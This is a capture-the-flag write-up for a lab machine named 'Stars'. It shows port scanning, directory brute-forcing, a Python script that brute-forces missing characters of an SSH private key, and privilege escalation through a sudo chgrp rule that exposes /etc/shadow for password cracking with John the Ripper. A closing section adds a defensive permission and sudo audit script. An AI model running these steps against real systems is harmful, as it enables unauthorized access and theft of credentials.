Stars
To begin with, we obtain the IP of the victim machine using the following command:
arp-scan -I eth0 --localnet
And now we perform a quick scan of all its ports to see which ones are open.
nmap -sS -p- --min-rate 4500 -n -Pn IP

Now we conduct a more detailed scan of those ports.
nmap -sCV -p22,80 -n -Pn IP

We enter the website hosted on this machine and come across the following text:

I decide to list directories and files using the Gobuster tool, and we come across a .txt file that gives us a clue.
gobuster dir -u http://IP/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,zip,php -t 130


We also obtain a possible username.
The next step is to use Burp Suite, where we come across a cookie whose value appears to be Base64-encoded text.

We decode it, and this is the result:
echo "cG9pc29uZWRnaWZ0LnR4dA==" | base64 -d

It turns out we have found a new hidden file on the website. It seems to be the private key for SSH access.

But it seems we can't use it yet, as the sshnote.txt file mentioned. I create a file called id_rsa.txt with the content of the private key and decide to quickly create a program using AI to automate substituting every three-letter combination for the missing part of the key and testing it over SSH until one combination works. Here's the code:
import subprocess
import itertools
import os

# SSH credentials
ip = 'IP'
username = 'sophie'

# Path to the file containing the private key ('***' marks the missing characters)
private_key_path = './id_rsa.txt'

# Read the private key from the file
with open(private_key_path, 'r') as file:
    private_key_data = file.read()

# Generate all possible combinations of three uppercase letters
letters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
combinations = itertools.product(letters, repeat=3)

# Iterate over the combinations and try SSH with each one
for combo in combinations:
    key = ''.join(combo)
    # Write the key to a temporary file
    with open('temp_key_file', 'w') as key_file:
        key_file.write(private_key_data.replace('***', key))
    try:
        # Change permissions of the temporary key file
        os.chmod('temp_key_file', 0o600)  # Permissions only for the owner
        # Execute SSH using the temporary key file
        ssh_command = f'ssh -i temp_key_file {username}@{ip}'
        subprocess.run(ssh_command, shell=True, check=True)
        print(f'Successful SSH connection using key: {key}')
        os.remove('temp_key_file')  # Remove the temporary key file
        break  # Stop the loop if a valid key is found
    except subprocess.CalledProcessError:
        print(f'Error: Authentication failed with key: {key}')
    except Exception as e:
        print(f'Error: {e}')
Finally, we make the script executable, run it, and we're in:
chmod +x auto_ssh.py

And we obtain the User Flag.
Now, running "sudo -l" shows that we can execute the chgrp binary as root with sudo without a password.

Let's see how it's used with the following command:
sudo -u root /usr/bin/chgrp --help

So we can change the group of any file we like. What I do is change the group of /etc/shadow to sophie.
sudo -u root /usr/bin/chgrp sophie /etc/shadow
We open it with cat, copy the line for root and paste it into a file named shadow.txt on our local machine. Then we open /etc/passwd and do the same, pasting its content into a file named passwd.txt.
Now, let's crack the root user's password hash. To do this, we'll use unshadow and John the Ripper:
unshadow passwd.txt shadow.txt > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
And we find the root password:

Finally, we access root and obtain the Root Flag.
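The escalation above works because a sudo rule for chgrp lets the user hand group ownership of /etc/shadow to a group they belong to. As an added example that is not part of the original write-up, the Python below checks the owner, group and mode of the shadow files against a baseline and flags "sudo -l" rules that grant ownership-changing binaries as root; the sudo -l text is a constructed sample with HOSTNAME as a placeholder.

```python
import grp, pwd
import os, re, stat

# Baseline for files that must stay unreadable to ordinary users. Group "shadow" is the
# Debian/Ubuntu convention; "root" covers distributions that keep the file root:root.
BASELINE = {
    "/etc/shadow":  {"owner": "root", "groups": {"root", "shadow"}, "max_mode": 0o640},
    "/etc/gshadow": {"owner": "root", "groups": {"root", "shadow"}, "max_mode": 0o640},
}
OWNERSHIP_BINARIES = {"chgrp", "chown"}  # re-assign ownership, and with it read access, as root
# One "sudo -l" rule line: "(runas) TAG: cmd1, cmd2"; tags such as NOPASSWD: are optional.
RULE_RE = re.compile(r"\((?P<runas>[^)]*)\)\s*(?:[A-Z]+:\s*)*(?P<cmds>.+)")

# Constructed sample of "sudo -l" output (HOSTNAME is a placeholder), not captured from the box.
SAMPLE_SUDO_L = """User sophie may run the following commands on HOSTNAME:
    (root) NOPASSWD: /usr/bin/chgrp
    (root) NOPASSWD: /usr/bin/less
"""

def assess(path, owner, group, mode):
    """Compare one file's owner, group and mode with BASELINE; return a list of findings."""
    expected, findings = BASELINE[path], []
    if owner != expected["owner"]:
        findings.append(f"{path}: owner is {owner}, expected {expected['owner']}")
    if group not in expected["groups"]:
        findings.append(f"{path}: group is {group}, expected one of {sorted(expected['groups'])}")
    if mode & ~expected["max_mode"]:  # any permission bit set that the baseline does not allow
        findings.append(f"{path}: mode {mode:04o} is wider than {expected['max_mode']:04o}")
    return findings

def audit_live():
    """Run assess() against the real filesystem; stat() needs no read access to the files."""
    findings = []
    for path in (p for p in BASELINE if os.path.exists(p)):
        st = os.stat(path)
        findings += assess(path, pwd.getpwuid(st.st_uid).pw_name,
                           grp.getgrgid(st.st_gid).gr_name, stat.S_IMODE(st.st_mode))
    return findings

def risky_sudo_rules(sudo_l_output):
    """Return the 'sudo -l' rule lines that run an ownership-changing binary as root."""
    flagged = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line.strip())
        if not m or m.group("runas").split(":")[0].strip() not in ("root", "ALL"):
            continue  # not a rule line, or a rule that does not run as root
        commands = [c.split()[0] for c in m.group("cmds").split(",") if c.strip()]
        if any(os.path.basename(c) in OWNERSHIP_BINARIES for c in commands):
            flagged.append(line.strip())
    return flagged
```

On a box where the chgrp step has already been performed, audit_live() reports the group change, so scheduling it alongside a review of sudo -l output catches both the misconfiguration and its use.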
